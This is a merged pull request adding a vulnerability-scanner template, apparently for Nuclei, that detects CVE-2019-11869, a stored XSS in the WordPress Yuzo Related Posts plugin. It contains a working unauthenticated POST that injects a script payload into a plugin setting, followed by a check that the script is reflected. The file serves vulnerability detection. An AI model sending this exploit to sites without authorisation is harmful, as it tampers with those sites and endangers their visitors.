Merge pull request #700 from Ganofins/patch-1

Add CVE-2019-11869

cves/CVE-2019-11869.yaml

@@ -0,0 +1,43 @@
+id: cve-2019-11869
+
+info:
+  name: Yuzo Related Posts plugin XSS
+  author: ganofins
+  severity: medium
+  description: |
+    The Yuzo Related Posts plugin before 5.12.94 for WordPress has XSS
+    because it mistakenly expects that is_admin() verifies that the
+    request comes from an admin user (it actually only verifies that the
+    request is for an admin page). An unauthenticated attacker can inject
+    a payload into the plugin settings, such as the
+    yuzo_related_post_css_and_style setting.
+
+    References:
+    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
+    - https://wpscan.com/vulnerability/9254
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Content-Type: application/x-www-form-urlencoded
+
+        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Upgrade-Insecure-Requests: 1
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "<script>alert(0);</script>") == true'
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(all_headers_2), 'text/html') == true"